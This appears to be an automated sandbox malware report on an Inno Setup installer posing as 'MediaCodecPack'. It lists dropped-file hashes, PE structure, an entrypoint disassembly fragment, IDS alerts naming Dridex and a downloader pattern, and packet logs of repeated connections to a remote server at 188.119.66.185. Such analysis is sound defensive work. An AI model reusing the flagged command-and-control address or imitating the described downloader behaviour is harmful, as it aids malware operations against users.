                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):717985
                                                                              Entropy (8bit):6.51490177808013
                                                                              Encrypted:false
                                                                              SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                              MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                              SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                              SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                              SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                              Malicious:true
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:InnoSetup Log MediaCodecPack, version 0x30, 4678 bytes, 364339\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11"
                                                                              Category:dropped
                                                                              Size (bytes):4678
                                                                              Entropy (8bit):4.715247277641487
                                                                              Encrypted:false
                                                                              SSDEEP:96:df2JXdWO38DpTlII39V+eOIhPea7ICSss/Lny4xNES9JYMJaJacPW:df2ldWO3opTliHIhPpICSsAny4HES9JD
                                                                              MD5:D3FCF7A45101FDA8193B3274051E6ECA
                                                                              SHA1:6B779282B46742CF1A3CCFF5B47C0EE0EF3E443D
                                                                              SHA-256:E4D5720B65F7E960081D7B658633F67B0E613D9BAE48F6E833AD2B41B2CED81F
                                                                              SHA-512:F4081EDB12C815C02ABAD4ED1BF623F8892769EA86A84C41A30A86214980B29954D7418940327228BF26692078AB5972E9B5D05B10B65C03EE65E462AD18A1B2
                                                                              Malicious:false

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 717985
Entropy (8bit): 6.51490177808013
Encrypted: false
SSDEEP: 12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
MD5: C1270D7DFE9B50EF58128A8A0BDD34D3
SHA1: 8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
SHA-256: F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
SHA-512: B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2560
Entropy (8bit): 2.8818118453929262
Encrypted: false
SSDEEP: 24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5: A69559718AB506675E907FE49DEB71E9
SHA1: BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256: 2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512: E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 6144
Entropy (8bit): 4.289297026665552
Encrypted: false
SSDEEP: 48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
MD5: C8871EFD8AF2CF4D9D42D1FF8FADBF89
SHA1: D0EACD5322C036554D509C7566F0BCC7607209BD
SHA-256: E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
SHA-512: 2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
File Type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 23312
Entropy (8bit): 4.596242908851566
Encrypted: false
SSDEEP: 384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5: 92DC6EF532FBB4A5C3201469A5B5EB63
SHA1: 3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256: 9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512: 9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\Desktop\newwork.exe.1.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 706560
Entropy (8bit): 6.506374420963084
Encrypted: false
SSDEEP: 12288:NTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyF:FPcYn5c/rPx37/zHBA6pFptZ1CENqMRU
MD5: ED6A19AD054AD0172201AF725324781B
SHA1: 817F409DBE431AE71D3AB4D70181257C3BEE4DBD
SHA-256: 79DB034686A25A6BA5DEF19B0CDEDB7097A78F994FB4A1CD33765E0FD49C9423
SHA-512: D5D67F03F50D6EED159BB967735B9AE2ADDA579110D35A23A76BC2DF2B023122805C64E913A2A333B45EE8412F799BAC1538C8D4573DCDA7BB8147ACB6445729
Malicious: true

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.997606116225022
TrID:
• Win32 Executable (generic) a (10002005/4) 98.73%
• Inno Setup installer (109748/4) 1.08%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name: newwork.exe.1.exe
File size: 3'314'669 bytes
MD5: 27b4fa67c0810bc212077971a00854ea
SHA1: 39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
SHA256: 2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
SHA512: bdb5c6f3fa1ea7b99df763f02919e044882b581bb6ad308da52a7885bb308ca70eaa477dc84bbde627427acb013d8fadf5694c3168cfa580f7a0978574f13018
SSDEEP: 98304:MfMeg4PkQUbNkhS0F6p1bfXNLDYtNmeJX2:g9PknkhSj1bf9LsmeF2
TLSH: FFE533FE7F84DD32F23604B95B2601BAC32B3D68196BA26837DD2C9E1F111A16971371
Icon Hash: 2d2e3797b32b2b99
Entrypoint: 0x40a5f8
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 1
OS Version Minor: 0
File Version Major: 1
File Version Minor: 0
Subsystem Version Major: 1
Subsystem Version Minor: 0
Import Hash: 884310b1928934402ea6fec1dbd3cf5e

Instruction (disassembly at entrypoint 0x40a5f8):
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F1B5D525E53h
call 00007F1B5D52705Ah
call 00007F1B5D5272E9h
call 00007F1B5D52738Ch
call 00007F1B5D52932Bh
call 00007F1B5D52BC96h
call 00007F1B5D52BDFDh
xor eax, eax
push ebp
push 0040ACC9h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040AC92h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F1B5D52C8ABh
call 00007F1B5D52C496h
cmp byte ptr [0040B234h], 00000000h
je 00007F1B5D52D38Eh
call 00007F1B5D52C9A8h
xor eax, eax
call 00007F1B5D526B49h
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F1B5D52993Bh
mov edx, dword ptr [ebp-10h]
mov eax, 0040CE28h
call 00007F1B5D525EEAh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CE28h]
mov dl, 01h
mov eax, 0040738Ch
call 00007F1B5D52A1CAh
mov dword ptr [0040CE2Ch], eax
xor edx, edx
push ebp
push 0040AC4Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F1B5D52C906h
mov dword ptr [0040CE34h], eax
mov eax, dword ptr [0040CE34h]
cmp dword ptr [eax+0Ch], 00000000h

Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9d30 | 0x9e00 | c3bd95c4b1a8e5199981e0d9b45fd18c | False | 0.6052709651898734 | data | 6.631765876950794 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x250 | 0x400 | 1ee71d84f1c77af85f1f5c278f880572 | False | 0.306640625 | data | 2.751820662285145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe8c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8c4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 0c0c7ee3853390cc0c21088a78f34d65 | False | 0.32555042613636365 | data | 4.491927698819795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4f4 | data | English | United States | 0.2610410094637224
RT_MANIFEST | 0x13570 | 0x5a4 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42590027700831024

Imports (DLL: imported functions):
kernel32.dll: DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll: MessageBoxA
oleaut32.dll: VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll: WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll: TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll: InitCommonControls
advapi32.dll: AdjustTokenPrivileges
Language of compilation system | Country where language is spoken
Dutch | Netherlands
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T13:50:44.078830+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:44.786700+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49838 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:46.393102+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49848 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:47.182885+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49848 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:52.215337+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49860 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:53.101821+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49860 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:54.683435+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49866 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:55.402293+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49866 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:57.372299+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49873 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:58.056391+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49873 | 188.119.66.185 | 443 | TCP
2024-12-18T13:50:59.690513+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49881 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:00.489357+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49881 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:02.248787+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49887 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:02.932989+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49887 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:04.724066+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49896 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:05.514546+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49896 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:07.197577+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49901 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:07.875652+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49901 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:09.461347+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:10.181163+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:11.743256+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49910 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:12.428721+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49910 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:13.998036+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49916 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:14.806062+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49916 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:16.560803+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49923 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:17.242829+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49923 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:19.083606+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49930 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:19.761430+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49930 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:21.596955+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49936 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:22.288127+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49936 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:23.865961+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49943 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:24.562804+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49943 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:26.136097+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49950 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:26.821610+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49950 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:28.436908+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49956 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:29.120824+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49956 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:30.915113+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49963 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:31.622068+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49963 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:33.333519+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49969 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:34.088417+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49969 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:35.870738+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49975 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:36.552860+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49975 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:38.316315+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49981 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:39.002791+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49981 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:40.821190+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49989 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:41.523825+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49989 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:43.173050+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 49995 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:43.939637+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49995 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:45.698502+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 50001 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:46.468759+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 50001 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:48.203505+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 50004 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:48.968184+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 50004 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:50.614745+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 50005 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:51.353310+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 50005 | 188.119.66.185 | 443 | TCP
2024-12-18T13:51:52.924243+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.10 | 50006 | 188.119.66.185 | 443 | TCP
                                                                              Dec 18, 2024 13:51:04.724455118 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:04.724462032 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:04.724653959 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:04.724658966 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.514569044 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.514643908 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.514677048 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.514704943 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.534476995 CET49896443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.534507036 CET44349896188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.688836098 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.688891888 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:05.689028978 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.690088034 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:05.690104008 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.195698023 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.197577000 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.198014021 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.198020935 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.198179960 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.198185921 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.875611067 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.875683069 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.875685930 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.875732899 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.876013041 CET49901443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.876041889 CET44349901188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.993635893 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.993685007 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:07.993742943 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.994132996 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:07.994148016 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:09.461261988 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:09.461347103 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:09.470988035 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:09.471012115 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:09.471174955 CET49905443192.168.2.10188.119.66.185
                                                                              Dec 18, 2024 13:51:09.471183062 CET44349905188.119.66.185192.168.2.10
                                                                              Dec 18, 2024 13:51:10.181215048 CET44349905188.119.66.185192.168.2.10
